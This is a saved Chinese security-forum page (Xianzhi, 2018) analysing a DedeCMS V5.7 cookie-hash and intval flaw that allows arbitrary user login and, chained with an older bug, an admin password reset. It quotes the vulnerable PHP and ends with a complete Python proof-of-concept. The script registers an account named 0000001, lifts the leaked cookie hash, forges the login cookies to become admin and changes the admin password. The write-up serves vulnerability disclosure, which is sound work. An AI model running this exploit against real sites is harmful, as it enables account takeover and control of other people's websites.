    <script src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/dt.js.下载"></script>


<div class="row box content">
    
    <div class="box-container">
        <div class="main-topic">
            <div class="clearfix user-info topic-list">
                <p><span class="content-title ">DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC</span>
                </p>
                <div class="topic-info">
                <span class="info-left">
                    <a href="https://xz.aliyun.com/u/3582">
                        <span class="username cell"> 茜さす</span></a> <span class="i-seprator"> / </span>
                    <span> 2018-01-18 09:43:00</span><span class="i-seprator"> / </span>
                    <span>浏览数 26193</span>
                    
                    
                    <span class="content-node">
                    
                        <span class="label label-default label-node-first">
                            <a href="https://xz.aliyun.com/tab/1">安全技术</a></span>
                        <span class="label label-default">
                            <a href="https://xz.aliyun.com/node/1">漏洞分析</a></span>
                    
                    </span>
                </span>
                    <span class="pull-right t-vote cell info-right"><a class="vote vote-up" href="javascript:" onclick="voteUp(1961);">
             顶(1)</a>
             <a class="vote vote-down" href="javascript:" onclick="voteDown(1961);">
             踩(0)</a></span>
                </div>
            </div>
            <hr>
            <div id="topic_content" class="topic-content markdown-body">
                
                    <p>
</p><pre><code>前面的登录思路是来源于——Joseph
后面的组合扩大攻击来源于——zxc</code></pre>
<h3 id="toc-0">简述</h3>
<p>Dedecms是一款开源的PHP开源网站管理系统。</p>
<p>DeDecms(织梦CMS)  V5.7.72 正式版20180109 (最新版)</p>
<p>前台会员模块是采用Cookie中的 DedeUserID+DedeUserID__ckMd5字段进行身份鉴别</p>
<p>DedeUserID用于定位区别用户，DedeUserID__ckMd5则是服务器生成散列，用于安全验证</p>
<p>Dedecms一处代码由于逻辑不够严谨，导致可以输入字符并获得服务器生成散列</p>
<p>劫持DedeUserID__ckMd5字段，绕过安全校验，配合类型转换造成任意用户登录漏洞</p>
<h3 id="toc-1">漏洞详细原理</h3>
<p>文件位置:dedecms/member/index.php:110行</p>

<pre><code>require_once(DEDEMEMBER . '/inc/config_space.php');
if ($action == '') {
    include_once(DEDEINC . "/channelunit.func.php");
    $dpl = new DedeTemplate();
    $tplfile = DEDEMEMBER . "/space/{$_vars['spacestyle']}/index.htm";
    //更新最近访客记录及站点统计记录
    $vtime = time();
    $last_vtime = GetCookie('last_vtime');
    $last_vid = GetCookie('last_vid');
    if (empty($last_vtime)) {
        $last_vtime = 0;
    }
    if ($vtime - $last_vtime &gt; 3600 || !preg_match('#,' . $uid . ',#i', ',' . $last_vid . ',')) {

        if ($last_vid != '') {
            $last_vids = explode(',', $last_vid);
            $i = 0;
            $last_vid = $uid;
            foreach ($last_vids as $lsid) {
                if ($i &gt; 10) {
                    break;
                } else if ($lsid != $uid) {
                    $i++;
                    $last_vid .= ',' . $last_vid;
                }
            }
        } else {
            $last_vid = $uid;
        }
        PutCookie('last_vtime', $vtime, 3600 * 24, '/');
        PutCookie('last_vid', $last_vid, 3600 * 24, '/');</code></pre>
<p>这段函数中$uid是我们可控的，如果Cookie中last_vid字段不存在就会走进这个分支</p>

<pre><code>} else {
            $last_vid = $uid;
        }</code></pre>
<p>也就变为<code>$last_vid</code>可控，然后<code>$last_vid</code>经过<code>PutCookie</code>函数进行处理</p>
<h3 id="toc-2">顺便一提</h3>
<p>文件位置：dedecms/include/helpers/cookie.helper.php</p>
<p>PutCookie这个函数是Dedecms在setcookie时封装的函数</p>
<p>GetCookie这个函数是Dedecms在获取Cookie中值封装的函数</p>
<p>如果Set一个键值对，PutCookie会Set两对Cookie，一个是要SET的键值对</p>
<p>另一个是值和key进行md5的哈希再截取前十六位的安全校验字符串(键名为<code>$key+'__ckMd5'</code>)</p>

<pre><code>if ( ! function_exists('PutCookie'))
{
    function PutCookie($key, $value, $kptime=0, $pa="/")
    {
        global $cfg_cookie_encode,$cfg_domain_cookie;
        setcookie($key, $value, time()+$kptime, $pa,$cfg_domain_cookie);
        setcookie($key.'__ckMd5', substr(md5($cfg_cookie_encode.$value),0,16), time()+$kptime, $pa,$cfg_domain_cookie);
    }
}</code></pre>
<p>GetCookie在返回键值之前，会通过PutCookie生成的十六位安全校验字符串对键值进行安全校验</p>
<p>确保获得的键值对有效且为服务器Set,增强安全性（但这里并不能抵御密文重放）</p>

<pre><code>if ( ! function_exists('GetCookie'))
{
    function GetCookie($key)
    {
        global $cfg_cookie_encode;
        if( !isset($_COOKIE[$key]) || !isset($_COOKIE[$key.'__ckMd5']) )
        {
            return '';
        }
        else
        {
            if($_COOKIE[$key.'__ckMd5']!=substr(md5($cfg_cookie_encode.$_COOKIE[$key]),0,16))
            {
                return '';
            }
            else
            {
                return $_COOKIE[$key];
            }
        }
    }
}</code></pre>
<p>在<code>$last_vid</code>经过PutCookie函数进行处理后，我们已经在Cookie可以获得校验哈希，绕过安全校验</p>
<h3 id="toc-3">Payload注入点</h3>
<p>文件位置:dedecms/include/memberlogin.class.php:161行</p>

<pre><code>function __construct($kptime = -1, $cache=FALSE)
{
    global $dsql;
    if($kptime==-1){
        $this-&gt;M_KeepTime = 3600 * 24 * 7;
    }else{
        $this-&gt;M_KeepTime = $kptime;
    }
    $formcache = FALSE;
    $this-&gt;M_ID = $this-&gt;GetNum(GetCookie("DedeUserID"));
    $this-&gt;M_LoginTime = GetCookie("DedeLoginTime");
    $this-&gt;fields = array();
    $this-&gt;isAdmin = FALSE;
    if(empty($this-&gt;M_ID))
    {
        $this-&gt;ResetUser();
    }else{
        $this-&gt;M_ID = intval($this-&gt;M_ID);
        if ($cache)
        {
            $this-&gt;fields = GetCache($this-&gt;memberCache, $this-&gt;M_ID);
            if( empty($this-&gt;fields) )
            {
                $this-&gt;fields = $dsql-&gt;GetOne("Select * From `#@__member` where mid='{$this-&gt;M_ID}' ");
            } else {
                $formcache = TRUE;
            }
        } else {
            $this-&gt;fields = $dsql-&gt;GetOne("Select * From `#@__member` where mid='{$this-&gt;M_ID}' ");
        }

        if(is_array($this-&gt;fields)){
            #api{{
            if(defined('UC_API') &amp;&amp; @include_once DEDEROOT.'/uc_client/client.php')
            {
                if($data = uc_get_user($this-&gt;fields['userid']))
                {
                    if(uc_check_avatar($data[0]) &amp;&amp; !strstr($this-&gt;fields['face'],UC_API))
                    {
                        $this-&gt;fields['face'] = UC_API.'/avatar.php?uid='.$data[0].'&amp;size=middle';
                        $dsql-&gt;ExecuteNoneQuery("UPDATE `#@__member` SET `face`='".$this-&gt;fields['face']."' WHERE `mid`='{$this-&gt;M_ID}'");
                    }
                }
            }
            #/aip}}

            //间隔一小时更新一次用户登录时间
            if(time() - $this-&gt;M_LoginTime &gt; 3600)
            {
                $dsql-&gt;ExecuteNoneQuery("update `#@__member` set logintime='".time()."',loginip='".GetIP()."' where mid='".$this-&gt;fields['mid']."';");
                PutCookie("DedeLoginTime",time(),$this-&gt;M_KeepTime);
            }
            $this-&gt;M_LoginID = $this-&gt;fields['userid'];
            $this-&gt;M_MbType = $this-&gt;fields['mtype'];
            $this-&gt;M_Money = $this-&gt;fields['money'];
            $this-&gt;M_UserName = FormatUsername($this-&gt;fields['uname']);
            $this-&gt;M_Scores = $this-&gt;fields['scores'];
            $this-&gt;M_Face = $this-&gt;fields['face'];
            $this-&gt;M_Rank = $this-&gt;fields['rank'];
            $this-&gt;M_Spacesta = $this-&gt;fields['spacesta'];
            $sql = "Select titles From #@__scores where integral&lt;={$this-&gt;fields['scores']} order by integral desc";
            $scrow = $dsql-&gt;GetOne($sql);
            $this-&gt;fields['honor'] = $scrow['titles'];
            $this-&gt;M_Honor = $this-&gt;fields['honor'];
            if($this-&gt;fields['matt']==10) $this-&gt;isAdmin = TRUE;
            $this-&gt;M_UpTime = $this-&gt;fields['uptime'];
            $this-&gt;M_ExpTime = $this-&gt;fields['exptime'];
            $this-&gt;M_JoinTime = MyDate('Y-m-d',$this-&gt;fields['jointime']);
            if($this-&gt;M_Rank&gt;10 &amp;&amp; $this-&gt;M_UpTime&gt;0){
                $this-&gt;M_HasDay = $this-&gt;Judgemember();
            }
            if( !$formcache )
            {
                SetCache($this-&gt;memberCache, $this-&gt;M_ID, $this-&gt;fields, 1800);
            }
        }else{
            $this-&gt;ResetUser();
        }
    }
}</code></pre>
<p>我们注入0000001(注册账户的账户名)和对应的<code>__ckMd5</code>校验值</p>

<pre><code>$this-&gt;M_ID = $this-&gt;GetNum(GetCookie("DedeUserID"));</code></pre>
<p>这里必须注册名0000001为的账户，不然没法通过另一个校验页面（校验账户是否存在）</p>
<p>文件位置：dedecms/member/inc/config_space.php</p>

<pre><code>if(!is_array($_vars))
{
    ShowMsg("你访问的用户可能已经被删除！","javascript:;");
    exit();
}</code></pre>
<p><code>$this-&gt;M_ID</code>赋值后变为0000001，然后巧妙地经过intval类型转换，变为1，也就是admin的id，也可以是任意用户的id</p>

<pre><code>$this-&gt;M_ID = intval($this-&gt;M_ID);</code></pre>
<p>然后带入了SQL查询语句，然后使用查询结果对登录信息进行赋值，造成任意用户登录。</p>

<pre><code>else {
    $this-&gt;fields = $dsql-&gt;GetOne("Select * From `#@__member` where mid='{$this-&gt;M_ID}' ");
}

if(is_array($this-&gt;fields)){
    #api{{
    if(defined('UC_API') &amp;&amp; @include_once DEDEROOT.'/uc_client/client.php')
    {
        if($data = uc_get_user($this-&gt;fields['userid']))
        {
            if(uc_check_avatar($data[0]) &amp;&amp; !strstr($this-&gt;fields['face'],UC_API))
            {
                $this-&gt;fields['face'] = UC_API.'/avatar.php?uid='.$data[0].'&amp;size=middle';
                $dsql-&gt;ExecuteNoneQuery("UPDATE `#@__member` SET `face`='".$this-&gt;fields['face']."' WHERE `mid`='{$this-&gt;M_ID}'");
            }
        }
    }
    #/aip}}

    //间隔一小时更新一次用户登录时间
    if(time() - $this-&gt;M_LoginTime &gt; 3600)
    {

        $dsql-&gt;ExecuteNoneQuery("update `#@__member` set logintime='".time()."',loginip='".GetIP()."' where mid='".$this-&gt;fields['mid']."';");
        PutCookie("DedeLoginTime",time(),$this-&gt;M_KeepTime);
    }
    $this-&gt;M_LoginID = $this-&gt;fields['userid'];
    $this-&gt;M_MbType = $this-&gt;fields['mtype'];
    $this-&gt;M_Money = $this-&gt;fields['money'];
    $this-&gt;M_UserName = FormatUsername($this-&gt;fields['uname']);
    $this-&gt;M_Scores = $this-&gt;fields['scores'];
    $this-&gt;M_Face = $this-&gt;fields['face'];
    $this-&gt;M_Rank = $this-&gt;fields['rank'];
    $this-&gt;M_Spacesta = $this-&gt;fields['spacesta'];
    $sql = "Select titles From #@__scores where integral&lt;={$this-&gt;fields['scores']} order by integral desc";
    $scrow = $dsql-&gt;GetOne($sql);
    $this-&gt;fields['honor'] = $scrow['titles'];
    $this-&gt;M_Honor = $this-&gt;fields['honor'];
    if($this-&gt;fields['matt']==10) $this-&gt;isAdmin = TRUE;
    $this-&gt;M_UpTime = $this-&gt;fields['uptime'];
    $this-&gt;M_ExpTime = $this-&gt;fields['exptime'];
    $this-&gt;M_JoinTime = MyDate('Y-m-d',$this-&gt;fields['jointime']);</code></pre>
<h1 id="toc-4">漏洞演示</h1>
<p>①注册0000001账户（用于登录admin,其他账户类推）</p>
<p>②注入Payload并获安全校验值</p>
<p><a id="img0" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/20180118095041-fd660970-fbf1-1.png"><img src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/20180118095041-fd660970-fbf1-1.png"></a></p>
<p>③</p>
<p><a id="img1" href="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/20180118095041-fd840a88-fbf1-1.png"><img src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/20180118095041-fd840a88-fbf1-1.png"></a></p>
<p><strong>漏洞更深入(管理员密码重置)</strong><br>
①利用之前的老漏洞重置admin的密码，这时只重置了member表里面的admin密码<br>
②利用现在这个漏洞登录admin,然后访问member/edit_baseinfo.php页面，member/edit_baseinfo.php中的修改信息的老密码判断是跟member表进行对比，刚好被我们上面步骤①重置了<br>
③满足条件后，修改密码的时候会同时修改admin.member两张表的密码<br>
文件位置:dedecms/member/edit_baseinfo.php:109行</p>

<pre><code>if( !in_array($sex, array('男','女','保密')) )
{
    ShowMsg('请选择正常的性别！','-1');
    exit();    
}

$query1 = "UPDATE `#@__member` SET pwd='$pwd',sex='$sex'{$addupquery} where mid='".$cfg_ml-&gt;M_ID."' ";
$dsql-&gt;ExecuteNoneQuery($query1);

//如果是管理员，修改其后台密码
if($cfg_ml-&gt;fields['matt']==10 &amp;&amp; $pwd2!="")
{
    $query2 = "UPDATE `#@__admin` SET pwd='$pwd2' where id='".$cfg_ml-&gt;M_ID."' ";
    $dsql-&gt;ExecuteNoneQuery($query2);
}
// 清除会员缓存
$cfg_ml-&gt;DelCache($cfg_ml-&gt;M_ID);
ShowMsg('成功更新你的基本资料！','edit_baseinfo.php',0,5000);
exit();</code></pre>
<h3 id="toc-5">POC</h3>
<div class="highlight"><pre><span></span><span class="c1"># coding=utf-8</span>

<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">re</span>

<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
    <span class="n">dede_host</span> <span class="o">=</span> <span class="s2">"http://127.0.0.1/"</span>
    <span class="n">oldpwd</span> <span class="o">=</span> <span class="s1">'123456'</span>
    <span class="n">newpwd</span> <span class="o">=</span> <span class="s2">"cnvdcnvd"</span>
    <span class="n">s</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">Session</span><span class="p">()</span>

    <span class="k">if</span> <span class="s1">'系统关闭了会员功能'</span> <span class="ow">in</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s1">'member/reg_new.php'</span><span class="p">)</span><span class="o">.</span><span class="n">content</span><span class="p">:</span>
        <span class="nb">exit</span><span class="p">(</span><span class="s1">'The system has closed the member function .Can not attack !!!'</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="s2">"The system opened the membership function, I wish you good luck  !!"</span>

    <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span><span class="s2">"Referer"</span><span class="p">:</span> <span class="n">dede_host</span> <span class="o">+</span> <span class="s2">"member/reg_new.php"</span><span class="p">}</span>
    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s1">'include/vdimgck.php'</span><span class="p">)</span><span class="o">.</span><span class="n">content</span>
    <span class="nb">file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'1.jpg'</span><span class="p">,</span> <span class="s2">"wb"</span><span class="p">)</span>
    <span class="nb">file</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">rs</span><span class="p">)</span>
    <span class="nb">file</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>

    <span class="n">vdcode</span> <span class="o">=</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">"Please enter the registration verification code : "</span><span class="p">)</span>

    <span class="n">userid</span> <span class="o">=</span> <span class="s1">'0000001'</span>
    <span class="n">uname</span> <span class="o">=</span> <span class="s1">'0000001'</span>
    <span class="n">userpwd</span> <span class="o">=</span> <span class="s1">'123456'</span>


    <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span><span class="s2">"User-Agent"</span><span class="p">:</span> <span class="s2">"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0)"</span><span class="p">,</span>
               <span class="s2">"Content-Type"</span><span class="p">:</span> <span class="s2">"application/x-www-form-urlencoded"</span><span class="p">}</span>
    <span class="n">data</span> <span class="o">=</span> <span class="s2">"dopost=regbase&amp;step=1&amp;mtype=</span><span class="si">%E</span><span class="s2">4%B8%AA</span><span class="si">%E</span><span class="s2">4%BA%BA&amp;mtype=</span><span class="si">%E</span><span class="s2">4%B8%AA</span><span class="si">%E</span><span class="s2">4%BA%BA&amp;userid={userid}&amp;uname={uname}&amp;userpwd={userpwd}&amp;userpwdok={userpwd}&amp;email=0000001%400000001.com&amp;safequestion=0&amp;safeanswer=&amp;sex=</span><span class="si">%E</span><span class="s2">7</span><span class="si">%94%</span><span class="s2">B7&amp;vdcode={vdcode}&amp;agree="</span><span class="o">.</span><span class="n">format</span><span class="p">(</span>
        <span class="n">userid</span><span class="o">=</span><span class="n">userid</span><span class="p">,</span> <span class="n">uname</span><span class="o">=</span><span class="n">uname</span><span class="p">,</span> <span class="n">userpwd</span><span class="o">=</span><span class="n">userpwd</span><span class="p">,</span> <span class="n">vdcode</span><span class="o">=</span><span class="n">vdcode</span><span class="p">)</span>
    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s1">'/member/reg_new.php'</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
    <span class="k">if</span> <span class="s2">"验证码错误"</span> <span class="ow">in</span> <span class="n">rs</span><span class="o">.</span><span class="n">content</span><span class="p">:</span>
        <span class="nb">exit</span><span class="p">(</span><span class="s2">"Verification code error, account registration failed"</span><span class="p">)</span>
    <span class="k">elif</span> <span class="s1">'注册成功'</span> <span class="ow">in</span> <span class="n">rs</span><span class="o">.</span><span class="n">content</span><span class="p">:</span>
        <span class="k">print</span> <span class="s1">'registration success !!'</span>

    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s2">"/member/index.php?uid={userid}"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">userid</span><span class="o">=</span><span class="n">userid</span><span class="p">))</span>
    <span class="k">if</span> <span class="s2">"资料尚未通过审核"</span> <span class="ow">in</span> <span class="n">rs</span><span class="o">.</span><span class="n">content</span><span class="p">:</span>
        <span class="nb">exit</span><span class="p">(</span><span class="s2">"User information has not been approved !!!"</span><span class="p">)</span>  <span class="c1"># 会员使用权限开通状态(-10 邮件验证 -1 手工审核, 0 没限制)：</span>
    <span class="n">searchObj</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'last_vid__ckMd5=(.*?);'</span><span class="p">,</span> <span class="n">rs</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s1">'Set-Cookie'</span><span class="p">],</span> <span class="n">re</span><span class="o">.</span><span class="n">M</span> <span class="o">|</span> <span class="n">re</span><span class="o">.</span><span class="n">I</span><span class="p">)</span>
    <span class="n">last_vid__ckMd5</span> <span class="o">=</span> <span class="n">searchObj</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">s</span><span class="o">.</span><span class="n">cookies</span><span class="p">[</span><span class="s1">'DedeUserID'</span><span class="p">]</span> <span class="o">=</span> <span class="n">userid</span>
    <span class="n">s</span><span class="o">.</span><span class="n">cookies</span><span class="p">[</span><span class="s1">'DedeUserID__ckMd5'</span><span class="p">]</span> <span class="o">=</span> <span class="n">last_vid__ckMd5</span>
    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s2">"/member/index.php"</span><span class="p">)</span>
    <span class="k">if</span> <span class="s2">"class=</span><span class="se">\"</span><span class="s2">userName</span><span class="se">\"</span><span class="s2">&gt;admin&lt;/a&gt;"</span> <span class="ow">in</span> <span class="n">rs</span><span class="o">.</span><span class="n">text</span><span class="p">:</span>
        <span class="k">print</span> <span class="s2">"Administrator login successful !!"</span>

    <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span><span class="s2">"Referer"</span><span class="p">:</span> <span class="n">dede_host</span> <span class="o">+</span> <span class="s2">"member/edit_baseinfo.php"</span><span class="p">}</span>
    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s1">'include/vdimgck.php'</span><span class="p">)</span><span class="o">.</span><span class="n">content</span>
    <span class="nb">file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'2.jpg'</span><span class="p">,</span> <span class="s2">"wb"</span><span class="p">)</span>
    <span class="nb">file</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">rs</span><span class="p">)</span>
    <span class="nb">file</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>

    <span class="n">vdcode</span> <span class="o">=</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">"Please enter the verification code : "</span><span class="p">)</span>

    <span class="n">data</span> <span class="o">=</span> <span class="p">{</span><span class="s2">"dopost"</span><span class="p">:</span> <span class="s2">"save"</span><span class="p">,</span> <span class="s2">"uname"</span><span class="p">:</span> <span class="s2">"admin"</span><span class="p">,</span> <span class="s2">"oldpwd"</span><span class="p">:</span> <span class="n">oldpwd</span><span class="p">,</span> <span class="s2">"userpwd"</span><span class="p">:</span> <span class="n">newpwd</span><span class="p">,</span> <span class="s2">"userpwdok"</span><span class="p">:</span> <span class="n">newpwd</span><span class="p">,</span>
            <span class="s2">"safequestion"</span><span class="p">:</span> <span class="s2">"0"</span><span class="p">,</span> <span class="s2">"newsafequestion"</span><span class="p">:</span> <span class="s2">"0"</span><span class="p">,</span> <span class="s2">"sex"</span><span class="p">:</span> <span class="s2">"男"</span><span class="p">,</span> <span class="s2">"email"</span><span class="p">:</span> <span class="s2">"admin@admin.com"</span><span class="p">,</span> <span class="s2">"vdcode"</span><span class="p">:</span> <span class="n">vdcode</span><span class="p">}</span>
    <span class="n">rs</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">dede_host</span> <span class="o">+</span> <span class="s1">'/member/edit_baseinfo.php'</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span>
    <span class="k">if</span> <span class="s2">"成功更新你的基本资料"</span> <span class="ow">in</span>  <span class="n">rs</span><span class="o">.</span><span class="n">content</span><span class="p">:</span>
       <span class="k">print</span> <span class="s2">"Administrator password modified successfully !!"</span>
       <span class="k">print</span> <span class="s2">"The new administrator password is : "</span> <span class="o">+</span> <span class="n">newpwd</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="s2">"attack fail"</span>
</pre></div>
<p></p>
                
            </div>
            

            <div class="post-user-action">
                <span class="btn btn-default pull-right" id="mark" data-action="topic" data-pk="1961">
                    <span id="mark-text">点击收藏 </span><span class="i-seprator"> | </span><span id="mark-count">0</span>
                </span>
                
                    <span class="btn btn-default pull-right" id="follow_topic" data-pk="1961">
                     <span>关注</span><span class="i-seprator"> | </span><span id="follow-count">3</span>
                    </span>
                
                <div class="clearfix"></div>
            </div>
            
            <div class="related-section">
                <div class="related-box">
                    
                    <span><a class="pull-left" target="_blank" href="https://xz.aliyun.com/t/1960" title="Misc 总结 ----流量分析 HTTP认识"><span class="related-label" style="padding: 3px 4px;margin-right: 3px;">上一篇：</span>Misc 总结 ----流量分析 ...</a></span>
                    
                    
                    <span><a class="pull-left" target="_blank" href="https://xz.aliyun.com/t/1963" title="DedeCMS V5.7 SP2前台任意文件删除"><span class="related-label" style="">下一篇：</span>DedeCMS V5.7 SP2前...</a></span>
                     
                </div>
            </div>
        
        </div>
    </div>
</div>



    <!-- topic & appendix -->
    



<div class="row box">
    <ol class="breadcrumb">
        <li class="active">1 条回复</li>
    </ol>
    <div class="box-container post-container">
        
            
                <ul class="post-info" id="reply-9665">
                    <li>
                        <div class="row1 user-info clearfix">
                            
                                <img class="avatar pull-left tiny-avatar" src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/default_avatar.png">
                            
                            <span class="post-info ">
                                 
                                <a class="label label-default" href="https://xz.aliyun.com/u/1083">tany</a>
                                
                                <span class="bbs-time">2018-01-25 14:29:43</span>

                            </span>
                            <div class="post-content markdown-body">
                                <p>学习了，感谢，测试了一下帐号用/d/w*的方式也可以登录对应的id</p>

                            </div>
                            <div class="manual-box">
                                <span class="thumbs " data-action="post" data-pk="9665" data-topic="1961"><i class="fa fa-thumbs-o-up"></i><span>0</span></span>
                                <span class="reply-jump reply reply-count " data-nickname="tany">回复Ta</span>
                            </div>
                        </div>

                        <hr>
                    </li>
                </ul>
            
        
    </div>
</div>


    <!-- posts of topic -->
    
        <div class="row box" id="reply-box">
            
            <div class="box-container clearfix">
                
                    <div class="reminder">
                        <a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F1961%3Ffrom%3Dgroupmessage&amp;from_type=xianzhi"><strong>登录</strong></a> 后跟帖
                    </div>
                
            </div>
        </div>
    
    <!-- editor for post -->
    

        </div>
        <div class="span3 pull-right offset sidebar">
            

    <div class="box">
        <div class="info-panel">
            <p><strong>先知社区</strong></p>
            <hr>
            <p class="text-center login-btn">
                <a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F1961%3Ffrom%3Dgroupmessage&amp;from_type=xianzhi" class="btn">现在登录</a>
            </p>
        </div>
    </div>

<div class="box">
    <div class="panel-info">
        <div class="info-body" style="padding: 10px">
            <a href="https://xz.aliyun.com/t/6209" target="_blank">
                <img src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/20190906101626-54be3efa-d04c-1.png" alt="">
            </a>
        </div>
    </div>
</div>
<div class="box">
    <div class="hot-node">
        <div class="info-head" style="border-bottom: 1px solid #ddd;padding: 10px;color: #999;">热门节点</div>
        <div class="info-body" style="padding: 10px">
            
                <a href="https://xz.aliyun.com/node/11" style="padding: 4px 10px 4px 10px;word-break: break-all;line-height: 14px;margin: 0 5px 5px 0;display: inline-block">技术文章</a>
            
        </div>
    </div>
</div>


    <div class="box">
        <div class="hot-node notice">
            <div class="info-body">
                <a href="https://xz.aliyun.com/notice" style="padding: 4px 10px 4px 10px;">社区小黑板</a>

            </div>
        </div>
    </div>


    <div class="box sfixed" id="toc-container">
        <div class="panel-info">
            <div class="panel-heading">
                <h4>目录</h4>
            </div>
            <div id="toc">
                <div class="high-light" style="display: block;background-color: #f3f3f3;position: absolute;"></div>
            <ol><li><a href="https://xz.aliyun.com/t/1961?from=groupmessage#toc-0">简述</a></li><li><a href="https://xz.aliyun.com/t/1961?from=groupmessage#toc-1">漏洞详细原理</a></li><li><a href="https://xz.aliyun.com/t/1961?from=groupmessage#toc-2">顺便一提</a></li><li><a href="https://xz.aliyun.com/t/1961?from=groupmessage#toc-3">Payload注入点</a></li><li><a href="https://xz.aliyun.com/t/1961?from=groupmessage#toc-4">漏洞演示</a><ol><li><ol><li><a href="https://xz.aliyun.com/t/1961?from=groupmessage#toc-5">POC</a></li></ol></li></ol></li></ol></div>
        </div>
    </div>


        </div>
    </div>


</div>
<footer class="bs-docs-footer">
    <div class="container text-center">
        <div class="links">
            <a href="https://xz.aliyun.com/feed" target="_blank">RSS</a>
            <a href="https://xz.aliyun.com/about" target="_blank"><span>关于社区</span></a>
            <a href="https://xz.aliyun.com/partner" target="_blank"><span>友情链接</span></a>
            <a href="https://xz.aliyun.com/notice">社区小黑板</a>
        </div>
    </div>
</footer>


    <script type="text/javascript">
        $(document).ready(function () {
            voteUp = function (topicPk) {
                if (topicPk) {
                    $.ajax({
                        url: '/forum/topic/up/',
                        data: {'pk': topicPk},
                        type: 'post',
                        dataType: 'json',
                        success: function (data) {
                            if (data.not_authenticated) {
                                window.location.href = 'https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F1961%3Ffrom%3Dgroupmessage&amp;from_type=xianzhi'
                            } else {
                                if (data.success) {
                                    $('.t-vote > .vote-up').html(data.html);
                                }
                            }
                        }
                    });
                }
            };
            voteDown = function (topicPk) {
                if (topicPk) {
                    $.ajax({
                        url: '/forum/topic/down/',
                        data: {'pk': topicPk},
                        type: 'post',
                        dataType: 'json',
                        success: function (data) {
                            if (data.not_authenticated) {
                                window.location.href = 'https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F1961%3Ffrom%3Dgroupmessage&amp;from_type=xianzhi'
                            } else {
                                if (data.success) {
                                    $('.t-vote > .vote-down').html(data.html);
                                }
                            }

                        }
                    });
                }
            };
            
        });
    </script>


    <script src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/z_stat.php" language="JavaScript"></script><script src="./DeDecms 任意用户登录,管理员密码重置漏洞分析&amp;POC - 先知社区_files/core.php" charset="utf-8" type="text/javascript"></script><a href="https://www.cnzz.com/stat/website.php?web_id=1260716569" target="_blank" title="站长统计">站长统计</a>


